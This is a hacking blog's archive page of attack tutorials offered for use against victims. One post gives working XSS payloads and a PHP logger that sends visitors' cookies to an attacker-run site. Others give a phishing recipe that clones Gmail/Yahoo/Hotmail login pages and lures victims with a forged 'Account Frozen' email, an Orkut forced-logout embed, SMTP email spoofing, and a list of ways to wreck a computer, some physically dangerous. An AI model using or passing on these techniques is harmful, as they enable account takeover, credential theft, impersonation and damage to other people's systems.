Category Archives: Bad Boy

Cookie Stealing for fun and profit

Posted on by
4

0×10 Introduction

XSS (cross site scripting) is usually criticized. It is said that XSS can do nothing, actually. All it can do is make a nice little alert box on your screen, telling you your cookies. That is a wrong assumption. Although it may be slightly difficult, you can use XSS to steal a user’s cookies. Cookies are used to store valuable information such as Username, Password, IP address and much more. This tutorial aims at teaching you Cookie Stealing, and by the end of this text file, you should be able to independently steal other people’s cookies.

DISCLAIMER:
This text is for educational purposes only. The author will not be held liable for any damages that occur from a reader for following this text or even learning from it.
######################################################

0×20 Finding the vulnerability

First, you have to find the XSS vulnerability. This may prove to be a bit of a challenge, but for sites with lower security, this is actually quite easy. For example, have you ever seen one of those guestbooks? Some of them are not properly configured to filter the text you type in. What does this mean? It means that you can manipulate the HTML of the page, and inject javascript code! Alright, let’s start off with something simple. Type this into the guestbook:
<script type=”text/javascript”>
alert(document.cookie)
</script>
Okay, now that’s done, click enter. If the guestbook does not properly check its input, then you should be able to see your cookie pop up! Of course, if you type that in and it doesn’t work, its probably gonna be a bit embarrassing, especially when the site admin taunts you. Anyway, to test whether a guestbook properly filters its input, type something like “You guys <b>suck</b>.” and see if the “suck” comes up in bold text.
If it does, the guestbook is probably not configured to filter input. However, XSS is not limited to guest books. Places in which you can change the HTML such as a page that uses a URL parameter to display an image or text, can be injected with a healthy dose
of XSS. For example, the URL is this:
site/bla.php?whatever=lol.gif
Now, imagine what the HTML for the image would be like…
<img src=”lol.gif”>
so they add a “> at the back, which means we can do this:
(start URL here)
site/bla.php?whatever=lol.gif”><script type=”text/javascript”>
alert(document.cookie)</script><a href=”test
(End url here)
and you’re done!

######################################################

0×30 Opening the gate

(This chapter is only for those who chose the URL as the XSS injection point, by the way)
Alright, all this is nice and pretty, but as I have said at the top, people criticize XSS as it can only work in your browser.
This means that to get an enemy’s password, you have to get him to sit down, login, and go to the injection page, then show you the alert box. Forgive my language, but like HELL that’s going to work. You have to be smart. You have to TRICK them into going into the page, and then use a technique I will explain in a later section to get their cookies.
This tricking technique is something known as social engineering. Don’t worry; it’s not
complicated at all. All you have to do is fool your friend. For example, if the page you are fooling him into going into is the guestbook, then you can say something like “Look at this cool guestbook! (insert URL here)” Be Creative. Don’t do it yet though, we still have the last piece of preparation to go…
######################################################

0×40 The Stealing

But once the luser goes to the site, what do you do then? “Hey, tell me all that info in that suspicious looking text box please?” Yeah right.
This is where the PHP code comes in. Get a free web host that supports PHP (preferably something like www.t35.com, although you will be breaking the rules in their TOS…) and make a new file. In the new file, type in this:

<html>

<body>

<?php

$stuff=$_GET['stuff'] . "\n";

$fh=fopen('evil.txt','ab');

fwrite($fh,$stuff);

fclose($fh);

?>

</body>

</html>


Wheee that was fun. Alright, save it as evil.php. Now make an empty text file named evil.txt, and type some stuff into it such as “Cookie Stealer Phile (Newline here)”. Alright, now you have to change the script that you put into the vulnerable site. Change it to

<IFRAME SRC=”javascript:window.location=%22(site)/evil.php?stuff=%22+document.cookie” height=”1″ width=”1″ frameborder=”0″></IFRAME>

Of course, change (site) into your site, and you are ready to go! Whenever a new luser gets lured into the trap, his cookies will be added to evil.txt!
######################################################

Sending a Computer to Hell

Posted on by
6

I was lying around thinking of ways to send a computer to hell and here were my ideas:

1. Flash the bios with a bogus file <and do not back up the bios>.
2. Run a magnet over EVERYTHING.
3. Using the control panel, add hardware that doesnt exist.
4. Change user passwords.
5. Click to every spyware site you can go to.
6. Install 100 virii <and the ones that mutate might breed with e/o>.
7. Write a little jscript (or vb) prog that makes 1000 popups and then one that you have to answer yes to for it to stop and make it run every bootup.
8. Change the language to chinese .
9. Glue the CD drive shut.
10. <this is very dangerous> put water on the power cable and then some metal filings and then plug in <try not to get shocked>.
11. Jam a piece of metal in a slot <pci, ram, etc>.
12. Fry the motherboard by taking a car battery and sending a surge of power through it.

Some more:

- Tape the CPU fan.
- Pull out a capacitor.
- Connect the IDE cables with the computer on (did this by accident once).
- Anything with water works..
- Burrying in sand and turning it on directly afterwards.
- submerging the hard drive, remove put it in the fridge wait 2 hrs plug into computer.
- connect it to a lightning rod grounding wire.
- While your at a skyscraper doing this, just toss it out the window somewhere above the 10th floor.
- create a batch script to partition the drive for a few hours/days.
- overclock and remove all fans.

Any More Ideas?

Block your friends scrapbook – ORKUT

Posted on by
11

It will be really scary when you will find out that you are not able to reply to your friends scrap from your own scrapbook. Yes this hack can be used to block anybody’s scrapbook. The best part is that after the scrapbook is blocked nobody can scrap him. Really cool!

Copy this and paste in your friends scrapbook.

<embed src=”http://www.orkut.com/GLogin.aspx?cmd=logout”></embed>

After this Whenever anybody will enter his scrapbook he will be Redirected to his Login Screen . Victim wouldn’t be able reply from his scrapbook and no one can enter in his profile and scrap him…

Solution : (To Unblock it)

To avoid being logged off again when you see the scrap, you can block flash in your browser.

For Firefox download the following plugin :

https://addons.mozilla.org/en-US/firefox/addon/433

In opera, you can disable the flash plugin.

Now this will only allow you to enter the scrapbook but your friends will still not be able to scrap you. So for that you need to delete the scrap.

Another Method:

First open your scrapbook.

Now Open your Orkut Homepage in a new window( Don’t close the scrapbook ). You will find the login page.

Now enter your detail and login to Orkut.

After being logged in delete the scrap from the scrapbook page that you had kept open.

Enjoy!!!

How to Hack Gmail or Yahoo or Hotmail or Any Other( New Version)

Posted on by
196
In the previous version of “how to hack gmail or yahoo or hotmail or any other” One problem faced was that whenever the victim clicks on login a message would come saying “This page will send your information through email” which could sometime fail your hack. But in this new version this problem is eliminated and this is has become more fullproof than the previous version.
First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.

Now follow the following steps :

  1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com
  2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.
  3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
  4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with <form method=”post” action=”https://login.yahoo.com/config/login?” autocomplete=”off” name=”login_form”> ( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”))
  5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)
    put the following code after placing your form id:
<form name=”New_Form” action=”http://www.webformdesigner.net/wfd_f2.php?id=Your Form ID Here” method=”post” enctype=”application/x-www-form-urlencoded” onsubmit=”return New_Form_CF();”>

Now Save the yahoofake.html.

To hack the victim’s password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.

First of all upload your page using some free webhosting services. Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site name.webhost.com”.

Now select your site name as mail.yahoo.com/support. You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.

Now send a fake mail from support_yahoo@yahoo.com to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.

After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked.

If you have your own ideas plz write it as comment to this post. Your participation is always appreciated. Good Luck !

Learn how to send your fake email

Posted on by
16

So, you want to learn how to send your own fake mail? It’s extraordinarily easy to do, and requires no extra software installed on your PC at all. It can be done with Windows, Macintosh, Linux – any modern PC that has an internet connection will do it.

There are a just a few simple steps. First, you’ll need to decide on the FROM and the TO email addresses. If the FROM address that you’re choosing isn’t a real one, make sure that the domain name (the bit after the @ sign) is a real one. If it’s not a real one, it almost certainly won’t work.


For the purpose of this tutorial, we’ll be sending from bush@whitehouse.gov to dummy@anysite.com.

Second, you’ll need to find out the mail server that your recipient is using.

Click Start, Run, enter “CMD”, then presss OK. In the window that comes up, type nslookup -q=MX anysite.com
Go to Applications, Utilities, and choose Terminal. In the window that comes up, type nslookup -q=MX anysite.com
Bring up your favourite shell, and type nslookup -q=MX anysite.com

There will be a lot of information on the screen – all you need to look for is a line that talks about a mail exchanger. If there are several, pick the one with the lowest “preference number”.

anysite.com        MX preference = 10, mail exchanger = mail.anysite.com

Now, you’ll need to connect to this mail exchanger using telnet. This is the same for any PC, but Vista users may not have it installed by default – see this note about getting telnet on Vista before you continue. When you’re ready, type:

telnet mail.anysite.com 25

Press enter, and after a short pause, you should see a welcome message from the server.

Ok, so now you’re connected. You need to enter the following information – press ENTER at each new line. You won’t be able to press backspace to delete a mistake, so you’ll need to type everything correctly first time!

HELO whitehouse.gov

This tells the mail server that we are “whitehouse.gov”.

MAIL FROM:

This tells the server who is sending the mail.

RCPT TO:

This tells the server who to deliver the mail to. At this point, if the recipient doesn’t exist, you may see a warning message (but not always).

DATA
This tells the server that we’re ready to start writing our message. It should acknowledge, telling you to end your message with a full stop (period) on a single line. All we need to do now, is write our message and don’t forget that full stop at the end.
Hello dummy@anysite, I managed to send a fake mail all by myself!.

Dont forget that last dot. When you’ve done that, and pressed enter, simply enter QUIT and your mail should be delivered.

There’s a little bit more to it, of course. You’ll need to enter proper “headers” if you want the mail to look more believable. After doing the DATA command, I’d recommend pasting in the following “headers” to make sure it looks realistic when viewed in Outlook, Hotmail, etc.

Date: Sun, 01 Apr 2007 12:49:13 +0100 (BST)From: George W Bush To: Poor Sod Subject: Fake mail

Hello dummy@anysite, I managed to send a fake mail all by myself!.

And that’s all there is to it.

A Java Trick that Pops Message " Ur Account Is Hacked"

Posted on by
1

javascript:function reverse() { var inp = “rekcaH yrgnuH yb dekcah si tnuocca tukrO ruoY “; var outp=”";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();

copy and paste d Above link On Address Bar.. n replace “rekcaH yrgnuH” by ur own Name.. n send it to ur friends

Or u can Manually create Any kind of Alert Box by

javascript:alert(” TYPE ANY MESSAGE HERE TO APPEAR IN ALERT BOX “)